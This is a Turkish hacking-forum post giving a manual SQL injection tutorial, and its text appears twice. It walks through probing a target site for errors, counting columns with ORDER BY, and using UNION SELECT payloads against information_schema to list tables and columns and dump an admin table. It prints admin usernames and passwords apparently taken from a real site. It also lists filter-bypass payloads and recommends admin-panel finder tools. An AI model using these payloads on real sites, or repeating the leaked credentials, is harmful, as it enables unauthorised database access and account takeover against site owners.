- 29 Nis 2012
- 280
- 0
Selamun Aleyküm Rahmetullahi Ve Berekatuh
Anlatacağım Konu Sql İnj Üzerine Çünkü Bakıldığı Zaman Görüle Bilirki Sql İnj Kullanamayıp Havij Ve Benzeri Yazılımlarla Site Hack Yapan Arkadaşlarımız Var Onlar İçin
Hazırlamak İstediğim Dökümanı Sizlere Sunmak İstedim Manuel Hem Zevkli Hemde Daha İyi Attack"lar Yaptığınızı Anlamak Açısından Manuel Önerilmeli Tabiki.
Konu Tamamen Bana Aittir.
---------------------------------------------------------
Sql İnj Dökümanında Neler Mevcut
1) Hedef Site Üzerinden Hata Almak
2) Hedef Site Tablo Sayısı Bulmak
3) Tablo Sayılarını Ve Tablo İsimlerini Çekmek
4) Kolon İsimlerini Çekmek
5) Size Tavsiye Edeceğim Admin Panel Bulucu Programlar
6) Bypass Yöntemleri
7) Kolon İsmi Hexlemek
---------------------------------------------------------
1) Hedef Site Üzerinden Hata Almak
Vazgeçilmezimiz " 'a " Veya ' Tırnak İşaretleriyle Hedef Sitemiz Üzerinden Hata Almaya Çalışırız. Konu Üzerine Bir Görüntü Paylaşmak İstiyorum İzninizle.
Hata Bu Şekilde Almaya Çalışırız Ve Hatamızdanda Bir Görüntü Paylaşmak İstiyorum.
İnşaALLAH Bu Konuyu Açıklığa Kavuştura Bilmişizdir.
2) Hedef Site Tablo Sayısı Bulmak
Çoğunlukla Kullandığımız Komut "order+by+1--" Bir Örnek Vermek İstiyorum "www.hedef.com/news.php?ID=29+order+by+1--" Dilerseniz Birde Resimle Örnek Verelim
Daha İyi Anlaşılması İçin.
Evet Görüldüğü Üzeri "order+by+1--" Komutu Kullandık Ve Hata Sayfamız Gitti Evet Bu İyi"ye İşaret Demek Oluyorki Tablo Sayımız 1 Veya 1 Sayısının Üzerinde Hata Alana Kadar
Sayıları Artıracağız "order+by+1--" Demiştik Devam Edelim "Bunu order+by+2-- , order+by+3--" Diyerek Artırıyoruz Hata Alana Kadar Devam Etmeliyiz Çünkü Tablo Sayısının Bittiği Yer Hata
Aldığımız Yerdir Bu Örneğin Daha İyi Anlaşılması İçin Hedef Sitemizden Resimli Örnek Gösterelim.
Evet Görüldüğü Üzeri "+order+by+13--" Yapmama Rağmen Hata Almadım Hata Alana Kadar Devam Edecez.
Evet "+order+by+14--" Yapınca Bir Hata Mesajı Aldık Ve 14 Tablo Bulunmadığını Belirtiyor Bu Demek Oluyorki 13 tablo Var Sitede Ve Tablo Sayımız "13" Olmaktadır.
3) Tablo Sayılarını Ve Tablo İsimlerini Çekmek
Evet 13 Tablo Bulmuştuk Onun Üzerinden Kafa Karıştırmadan Devam Edelim.
Hemen Bir Örnek Vermek İstiyorum Biz 13 Tablo Tespit Etmiştik Hedef Sitemiz Üzerinden
Burda Kullandığımız Komut Şu "+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--" Evet 13 Kolon Tespit Etmiştik "Union" Ve "Select" Komutuyla Bu Sayıları 1"den 13"e Kadar
Sıraladık Ve Tablo Sayımızı Bulmak İçin Bize Tablo Sayımızı Verdi " 5 " Ve " 6 " Sayılarını Verdi İstediklerimiz Bunun İçinde Saklanmış Durumda Bu Konuyu Atlamadan Daha İyi
Anlaşılması İçin Resimli Bir Örnek Vermek İstiyorum.
Devam Edelim Şimdi İse Bu " 5 " Sayısının Altında Gizlenen Bilgilerimizi Yani Tablo İsimlerimizi Çekelim. Hemen Nasıl Çekeceğimiz Hakkında Örnek Vermek İstiyorum
Komutumuzla Tablo İsimlerimizi Çekiyoruz Burda Kullandığımız Komutlar
Evet Bu Komut İle Tablo isimlerimizi Veri Tabanından Çekmiş Olduk İsterseniz Bunu Resimli Örneğimizle Daha Açıklayıcı Bir Hale Çevirelim.
Görmüş Olduğunuz Üzeri Tablo İsimlerimizi Şu Komutumuzla Çektik
Ve Bize Vermiş Olduğu Tablo İsimleri Şunlar :
4) Kolon İsimlerini Çekmek
Evet İsterseniz Tüm Tabloları Göre Bilirsiniz Şu Komutumuzla Görebiliriz Tabi
Dikkatinizi Çekmiştir "group_concat(table_name)" yaptığımız yeri "group_concat(column_name)" Olarak Değiştirdik Birde Şu Kısmı "information_schema.tables" Olan Yeri " information_schema.columns" Olarak Değiştirdikten Sonra
Kolonları Çektiğinizi Fark Edeceksiniz.
Bize Şimdilik Gerekli " csm_admins " Olarak Gözüküyor Neyse Devam Edelim Sadece Bu Tablomuzla Bakalım Bize Vereceği Kolonların İçinde Username,Password Veya Ona Benzer
Herhangi Bir Seçenek Varmı Diye Kontrol Edelim.
Şu Komutumuzla Kontrol Ediyoruz =
Şimdi Şu Komutu Biraz Açalım Neler Ekledik Ve Sadece Bu Kolonu Çekebildik
Fark Ettiniz Değilmi "database()" Komutunun Sonuna Şu Komutları Ekledik "+and+table_name=0x636D735F61646D696E73" Buda Neyin Nesi Derseniz " 636D735F61646D696E73 " Bu " csm_admins " Kolonun Hexlenmiş Hali
Hex"e Şimdi Değinmek Doğru Olurmu Bilmiyorum Kafanızın Karışmaması Açısından Şimdi Değinmiyelim Siz Hex"i Araştırın Veya Sonlarda Değinelim.
Evet "csm_admins" İçindeki Bilgileri Çektik Bilgilerimiz Şunlar : " ID,uid,pwd,generali " Daha Açıklayıcı Hale Getirmek İçin Resim Paylaşmak İstiyorum.
Evet Görmüş Olduğumuz Gibi " csm_admins " İçindeki Bilgileri Çektik Ama Pwd Password Olduğunu Zannediyorumda Username Nerde
Neyse Devam Edelim
En Son Çektiğimiz Bilgiler Şunlardı Hatırlatmakta Fayda Var " ID,uid,pwd,generali " Şunları Çekelim Ve Bakalım Username Ve Password Bilgilerini Elde Edebilecekmiyiz
Şu Komutumuzla Elde Etmeye Çalışalım Bilgilerimizi
Evet Bilgilerimizi Çektik Ve Bilgiler :" Username = i-deas Şifre = 0501BT65 , Username = matteo Şifre = @merba.2k13 "
Görünen O Ki 2 Admin Var Sitede MaşaALLAH
Daha Açıklayıcı Bir Hale Getirmek İçin Aldığımız Görüntüyü Paylaşmak İstiyorum.
Ve İşte Bu Kadar Şimdi Admin Panelini Bulmak Kaldı
5) Size Tavsiye Edeceğim Admin Panel Bulucu Programlar
1) Havij 400 Küsür Panel Taratıyor Azda Olsa Bazen İşimize Yarıyor.
2) Size Tavsiye Edeceğim Federiko Kardeşimizin Yazılımı Gerçekten İşe Yarıyor Ellerine Sağlık Tekrar Tebrik Etmek İstiyorum Kendisini.
Link : FEDERIKO s A.P. Scanner v2.0 | Fixed \ Web Gvenlik Aklar > Cyber-Warrior.Org Şu Konudan Ulaşa Bilirsiniz
3)Acunetix Web Vulnerability Scanner Gibi Site Linklerini Taratan Yazılımlar Panel Bulucuların Tıkandığı Yerde Bu Tür Yazılımlar Devreye Girer İşe Yarıyor Çoğu Zaman
6) Bypass Yöntemleri
Bypass Tipler
1)
2)
3)
4)
Bypass Türlerini Kullanacağımız Yerler
1) Bu " id=1')+order+by+1--+ " Bypass Türü Genellikle Hataları Göremediğimiz Hedef Siteler Üzerinde Çok Etkili Oluyor.
2) Bu " +/*union*/+/*select*/+1,2,3,4,5,6,7,8,9-- " Bypass Türü İse Fobiden Gibi Korunma Altına Alınan Sitelerde Etkili Oluyor.
3) Bu " /*!50000union*/+/*!50000select*/+ " Bu Bypass Türü İse 2.Bypass Türünün İşi Yaramadığı Yerlerde Devreye Giriyor.
4) Bu " news.php?ID="-"29 " Evet Bu Anlatımda İşimize Yaramadı Ama Çoğu Zaman Yarıyor Tabloları Göremediğimiz Zaman Bu Devreye Giriyor "id=2" id Değerinin Yanında Bulanan
Rakamın Önüne " - " Koyulduğu Zaman Tabloları Rahatlıla Göre Biliriz Çoğu Zaman İşe Yarıyor "id=-2" Gibi.
7) Kolon İsmi Hexlemek
Evet Arkadaşlar Konuda Değindiğim Gibi Tablo Hexlemeyi Son Rutuşlarda Göstereceğimi Belirtmiştim.
username Ve Password Bu Kolonun İçinde " cms_admins " Ve Şunu Hexleyip Sadece Bu Kolonu İçindeki Bilgileri Almak İstiyoruz.
Hemen Hex Sitesine Giriyoruz Kullandığım Hex Sitesi : Hex Encode - Online Hex Encoder
Hemen Nasıl Hexliyeceğimiz Resim İle Gösterelim
HexEncode Dedikten Sonra Altaki Kutumuza Hexli Hali Gelecektir Onuda Görüntüyle Belirtelim.
Evet Hexledik Şimdi Bunu İcraate Dökelim
Hexli Hali : 636D735F61646D696E73
Hem Bir Örnek Verelim
Örnek =
Hex"i Şu Şekilde Kullanıyoruz "database()"den Hemen Sonra Devam Edelim "+and+table_name=x0636D735F61646D696E73" Diye Devam Ettikmi Username Ve Password Az Önce Elde Ettiğimiz Gibi
Elimizde Olur İnşaALLAH.
Evet Arkadaşlar Konumuz Bitti Elhamdurillah.
Şüphesizki Yanlışlar Şeytandan Ve Nevsimdendir Doğrular İse Alemlerin Rabbi Olan ALLAH"tandır.
Yanlışlarım Olmuştur İllaki Kusuruma Bakmazsınız İnşaALLAH Elimden Geldiğince Ve Bilgimin Olduğu Kadar Sizlerle Paylaşmak İstedim Yanlışlarımdan Dolayı Lütfen Kusuruma Bakmayın.
Faydalı Olur Bilmiyen Kardeşlerim İçin İnşaALLAH.
Gayret Bizden Başarı Yanlızca ALLAH"tandır.
Bizelere Dua Edin İnşaALLAH Selamun Aleyküm Rahmetullahi Ve Berekatuhu.
BİSMİLLAHİRRAHMANİRRAHİM
Anlatacağım Konu Sql İnj Üzerine Çünkü Bakıldığı Zaman Görüle Bilirki Sql İnj Kullanamayıp Havij Ve Benzeri Yazılımlarla Site Hack Yapan Arkadaşlarımız Var Onlar İçin
Hazırlamak İstediğim Dökümanı Sizlere Sunmak İstedim Manuel Hem Zevkli Hemde Daha İyi Attack"lar Yaptığınızı Anlamak Açısından Manuel Önerilmeli Tabiki.
Konu Tamamen Bana Aittir.
---------------------------------------------------------
Sql İnj Dökümanında Neler Mevcut
1) Hedef Site Üzerinden Hata Almak
2) Hedef Site Tablo Sayısı Bulmak
3) Tablo Sayılarını Ve Tablo İsimlerini Çekmek
4) Kolon İsimlerini Çekmek
5) Size Tavsiye Edeceğim Admin Panel Bulucu Programlar
6) Bypass Yöntemleri
7) Kolon İsmi Hexlemek
---------------------------------------------------------
1) Hedef Site Üzerinden Hata Almak
Vazgeçilmezimiz " 'a " Veya ' Tırnak İşaretleriyle Hedef Sitemiz Üzerinden Hata Almaya Çalışırız. Konu Üzerine Bir Görüntü Paylaşmak İstiyorum İzninizle.
Hata Bu Şekilde Almaya Çalışırız Ve Hatamızdanda Bir Görüntü Paylaşmak İstiyorum.
İnşaALLAH Bu Konuyu Açıklığa Kavuştura Bilmişizdir.
2) Hedef Site Tablo Sayısı Bulmak
Çoğunlukla Kullandığımız Komut "order+by+1--" Bir Örnek Vermek İstiyorum "www.hedef.com/news.php?ID=29+order+by+1--" Dilerseniz Birde Resimle Örnek Verelim
Daha İyi Anlaşılması İçin.
Evet Görüldüğü Üzeri "order+by+1--" Komutu Kullandık Ve Hata Sayfamız Gitti Evet Bu İyi"ye İşaret Demek Oluyorki Tablo Sayımız 1 Veya 1 Sayısının Üzerinde Hata Alana Kadar
Sayıları Artıracağız "order+by+1--" Demiştik Devam Edelim "Bunu order+by+2-- , order+by+3--" Diyerek Artırıyoruz Hata Alana Kadar Devam Etmeliyiz Çünkü Tablo Sayısının Bittiği Yer Hata
Aldığımız Yerdir Bu Örneğin Daha İyi Anlaşılması İçin Hedef Sitemizden Resimli Örnek Gösterelim.
Evet Görüldüğü Üzeri "+order+by+13--" Yapmama Rağmen Hata Almadım Hata Alana Kadar Devam Edecez.
Evet "+order+by+14--" Yapınca Bir Hata Mesajı Aldık Ve 14 Tablo Bulunmadığını Belirtiyor Bu Demek Oluyorki 13 tablo Var Sitede Ve Tablo Sayımız "13" Olmaktadır.
3) Tablo Sayılarını Ve Tablo İsimlerini Çekmek
Evet 13 Tablo Bulmuştuk Onun Üzerinden Kafa Karıştırmadan Devam Edelim.
Hemen Bir Örnek Vermek İstiyorum Biz 13 Tablo Tespit Etmiştik Hedef Sitemiz Üzerinden
Kod:
http://www.hedef.com/news.php?ID=29+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--Burda Kullandığımız Komut Şu "+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--" Evet 13 Kolon Tespit Etmiştik "Union" Ve "Select" Komutuyla Bu Sayıları 1"den 13"e Kadar
Sıraladık Ve Tablo Sayımızı Bulmak İçin Bize Tablo Sayımızı Verdi " 5 " Ve " 6 " Sayılarını Verdi İstediklerimiz Bunun İçinde Saklanmış Durumda Bu Konuyu Atlamadan Daha İyi
Anlaşılması İçin Resimli Bir Örnek Vermek İstiyorum.
Devam Edelim Şimdi İse Bu " 5 " Sayısının Altında Gizlenen Bilgilerimizi Yani Tablo İsimlerimizi Çekelim. Hemen Nasıl Çekeceğimiz Hakkında Örnek Vermek İstiyorum
Kod:
http://www.hedef.com/news.php?ID=29+union+select+1,2,3,4,group_concat(table_name),6,7,8,9,10,11,12,13+from+information_schema.tables+where+table_schema=database()--Komutumuzla Tablo İsimlerimizi Çekiyoruz Burda Kullandığımız Komutlar
Kod:
+union+select+1,2,3,4,group_concat(table_name),6,7,8,9,10,11,12,13+from+information_schema.tables+where+table_schema=database()--Evet Bu Komut İle Tablo isimlerimizi Veri Tabanından Çekmiş Olduk İsterseniz Bunu Resimli Örneğimizle Daha Açıklayıcı Bir Hale Çevirelim.
Görmüş Olduğunuz Üzeri Tablo İsimlerimizi Şu Komutumuzla Çektik
Kod:
http://www.hedef.com/news.php?ID=29+union+select+1,2,3,4,group_concat(table_name),6,7,8,9,10,11,12,13+from+information_schema.tables+where+table_schema=database()--Ve Bize Vermiş Olduğu Tablo İsimleri Şunlar :
Kod:
cms_admins,cms_home,cms_lingua,cms_menu,cms_menu_admin,cms_menu_utente,cms_news,cms_news_tipo,cms_pagine,cms_prod_categoria,cms_prod_sottocat,cms_prodotti4) Kolon İsimlerini Çekmek
Evet İsterseniz Tüm Tabloları Göre Bilirsiniz Şu Komutumuzla Görebiliriz Tabi
Kod:
http://www.hedef.com/news.php?ID=29+union+select+1,2,3,4,group_concat(column_name),6,7,8,9,10,11,12,13+from+information_schema.columns+where+table_schema=database()--Dikkatinizi Çekmiştir "group_concat(table_name)" yaptığımız yeri "group_concat(column_name)" Olarak Değiştirdik Birde Şu Kısmı "information_schema.tables" Olan Yeri " information_schema.columns" Olarak Değiştirdikten Sonra
Kolonları Çektiğinizi Fark Edeceksiniz.
Bize Şimdilik Gerekli " csm_admins " Olarak Gözüküyor Neyse Devam Edelim Sadece Bu Tablomuzla Bakalım Bize Vereceği Kolonların İçinde Username,Password Veya Ona Benzer
Herhangi Bir Seçenek Varmı Diye Kontrol Edelim.
Şu Komutumuzla Kontrol Ediyoruz =
Kod:
http://www.hedef.com/news.php?ID=29+union+select+1,2,3,4,group_concat(column_name),6,7,8,9,10,11,12,13+from+information_schema.columns+where+table_schema=database()+and+table_name=x0636D735F61646D696E73--Şimdi Şu Komutu Biraz Açalım Neler Ekledik Ve Sadece Bu Kolonu Çekebildik
Kod:
+union+select+1,2,3,4,group_concat(column_name),6,7,8,9,10,11,12,13+from+information_schema.columns+where+table_schema=database()+and+table_name=x0636D735F61646D696E73--Fark Ettiniz Değilmi "database()" Komutunun Sonuna Şu Komutları Ekledik "+and+table_name=0x636D735F61646D696E73" Buda Neyin Nesi Derseniz " 636D735F61646D696E73 " Bu " csm_admins " Kolonun Hexlenmiş Hali
Hex"e Şimdi Değinmek Doğru Olurmu Bilmiyorum Kafanızın Karışmaması Açısından Şimdi Değinmiyelim Siz Hex"i Araştırın Veya Sonlarda Değinelim.
Evet "csm_admins" İçindeki Bilgileri Çektik Bilgilerimiz Şunlar : " ID,uid,pwd,generali " Daha Açıklayıcı Hale Getirmek İçin Resim Paylaşmak İstiyorum.
Evet Görmüş Olduğumuz Gibi " csm_admins " İçindeki Bilgileri Çektik Ama Pwd Password Olduğunu Zannediyorumda Username Nerde
Neyse Devam EdelimEn Son Çektiğimiz Bilgiler Şunlardı Hatırlatmakta Fayda Var " ID,uid,pwd,generali " Şunları Çekelim Ve Bakalım Username Ve Password Bilgilerini Elde Edebilecekmiyiz
Şu Komutumuzla Elde Etmeye Çalışalım Bilgilerimizi
Kod:
http://www.hedef.com/news.php?ID=29+union+select+1,2,3,4,group_concat(uid,0x3a,pwd),6,7,8,9,10,11,12,13+from+cms_admins--Evet Bilgilerimizi Çektik Ve Bilgiler :" Username = i-deas Şifre = 0501BT65 , Username = matteo Şifre = @merba.2k13 "
Görünen O Ki 2 Admin Var Sitede MaşaALLAH
Daha Açıklayıcı Bir Hale Getirmek İçin Aldığımız Görüntüyü Paylaşmak İstiyorum.
Ve İşte Bu Kadar Şimdi Admin Panelini Bulmak Kaldı
5) Size Tavsiye Edeceğim Admin Panel Bulucu Programlar
1) Havij 400 Küsür Panel Taratıyor Azda Olsa Bazen İşimize Yarıyor.
2) Size Tavsiye Edeceğim Federiko Kardeşimizin Yazılımı Gerçekten İşe Yarıyor Ellerine Sağlık Tekrar Tebrik Etmek İstiyorum Kendisini.
Link : FEDERIKO s A.P. Scanner v2.0 | Fixed \ Web Gvenlik Aklar > Cyber-Warrior.Org Şu Konudan Ulaşa Bilirsiniz
3)Acunetix Web Vulnerability Scanner Gibi Site Linklerini Taratan Yazılımlar Panel Bulucuların Tıkandığı Yerde Bu Tür Yazılımlar Devreye Girer İşe Yarıyor Çoğu Zaman
6) Bypass Yöntemleri
Bypass Tipler
1)
Kod:
id=1')+order+by+1--+2)
Kod:
+/*union*/+/*select*/+1,2,3,4,5,6,7,8,9--3)
Kod:
/*!50000union*/+/*!50000select*/+4)
Kod:
news.php?ID="-"29Bypass Türlerini Kullanacağımız Yerler
1) Bu " id=1')+order+by+1--+ " Bypass Türü Genellikle Hataları Göremediğimiz Hedef Siteler Üzerinde Çok Etkili Oluyor.
2) Bu " +/*union*/+/*select*/+1,2,3,4,5,6,7,8,9-- " Bypass Türü İse Fobiden Gibi Korunma Altına Alınan Sitelerde Etkili Oluyor.
3) Bu " /*!50000union*/+/*!50000select*/+ " Bu Bypass Türü İse 2.Bypass Türünün İşi Yaramadığı Yerlerde Devreye Giriyor.
4) Bu " news.php?ID="-"29 " Evet Bu Anlatımda İşimize Yaramadı Ama Çoğu Zaman Yarıyor Tabloları Göremediğimiz Zaman Bu Devreye Giriyor "id=2" id Değerinin Yanında Bulanan
Rakamın Önüne " - " Koyulduğu Zaman Tabloları Rahatlıla Göre Biliriz Çoğu Zaman İşe Yarıyor "id=-2" Gibi.
7) Kolon İsmi Hexlemek
Evet Arkadaşlar Konuda Değindiğim Gibi Tablo Hexlemeyi Son Rutuşlarda Göstereceğimi Belirtmiştim.
username Ve Password Bu Kolonun İçinde " cms_admins " Ve Şunu Hexleyip Sadece Bu Kolonu İçindeki Bilgileri Almak İstiyoruz.
Hemen Hex Sitesine Giriyoruz Kullandığım Hex Sitesi : Hex Encode - Online Hex Encoder
Hemen Nasıl Hexliyeceğimiz Resim İle Gösterelim
HexEncode Dedikten Sonra Altaki Kutumuza Hexli Hali Gelecektir Onuda Görüntüyle Belirtelim.
Evet Hexledik Şimdi Bunu İcraate Dökelim
Hexli Hali : 636D735F61646D696E73
Hem Bir Örnek Verelim
Örnek =
Kod:
http://www.hedef.com/news.php?ID=29+union+select+1,2,3,4,group_concat(column_name),6,7,8,9,10,11,12,13+from+information_schema.columns+where+table_schema=database()+and+table_name=x0636D735F61646D696E73--Hex"i Şu Şekilde Kullanıyoruz "database()"den Hemen Sonra Devam Edelim "+and+table_name=x0636D735F61646D696E73" Diye Devam Ettikmi Username Ve Password Az Önce Elde Ettiğimiz Gibi
Elimizde Olur İnşaALLAH.
Evet Arkadaşlar Konumuz Bitti Elhamdurillah.
Şüphesizki Yanlışlar Şeytandan Ve Nevsimdendir Doğrular İse Alemlerin Rabbi Olan ALLAH"tandır.
Yanlışlarım Olmuştur İllaki Kusuruma Bakmazsınız İnşaALLAH Elimden Geldiğince Ve Bilgimin Olduğu Kadar Sizlerle Paylaşmak İstedim Yanlışlarımdan Dolayı Lütfen Kusuruma Bakmayın.
Faydalı Olur Bilmiyen Kardeşlerim İçin İnşaALLAH.
Gayret Bizden Başarı Yanlızca ALLAH"tandır.
Bizelere Dua Edin İnşaALLAH Selamun Aleyküm Rahmetullahi Ve Berekatuhu.
